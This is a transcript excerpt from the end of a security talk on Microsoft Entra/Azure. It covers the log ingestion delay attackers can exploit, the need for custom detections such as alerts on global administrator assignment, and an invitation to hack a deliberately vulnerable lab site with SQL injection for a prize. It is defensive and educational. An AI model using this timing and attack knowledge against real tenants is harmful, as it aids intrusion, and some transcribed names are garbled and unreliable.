awesome. We will got all the alerts in there. Well, the ingestion delay on log analytics from Entra is between 5 and 15 minutes. So if anybody offensive is in here, you know, you can do a lot with a global administrator within five up to 15 minutes. >> Yeah. >> So you will be toast anyway. >> All right, let's um some of these detections I will skip. The main point that I'm trying to make is that natively speaking, many of the things that we've done just now will go unnoticed if you don't add custom detections for it. Luckily, there's quite a big community that shares these things publicly. uh open source it through kqlarch.com. You can visit it. There's a lot of stuff on

there. Um and yeah, that's I think that's that's pretty much it. I'll skip through some of this. Also, when you add global administrator, normally speaking, you get an email automatically. It's very easy to detect global administrator assignments. Um and it's something the very least, please detect something like that. Even if it's a legitimate behavior, it's important to know who your who your global admins are and at what time the permissions have been granted. >> Yep. >> Um I'll skip this one too. I'll skip the demo. Um again, familiar page. Um if you want to have an opportunity at the€,000 of Azure credit, go to this website and try to breach it. You're able to become global

administrator if you can get that far. If you do that and you send a message to him on LinkedIn, >> yeah, you'll get a subscription within the environment with about a thousand euros of credit. I've got about €13,000 per year for Microsoft, which is fun. So, I decided to make something fun of a session. So, if we were not able to create a global admin account, you would all feel very bad about it and disappointed. I said, well, maybe I can make you happy owning €1,000 in Azure credits within my subscription. Um there are some vulnerabilities in there about 60 including a SQL injection. There's full back end in there. Um so have fun. >> Yeah. One suggestion as with every web

website vulnerability start by looking at the inspection of the page. Um before we go to questions, last thing. If you want to use the blacket tooling QR code on the screen, you can uh scan it now. Um, and yeah, that's about it. Um, if you want to look for us and find us, um, LinkedIn is on the page, too. Yeah. Thanks for your time.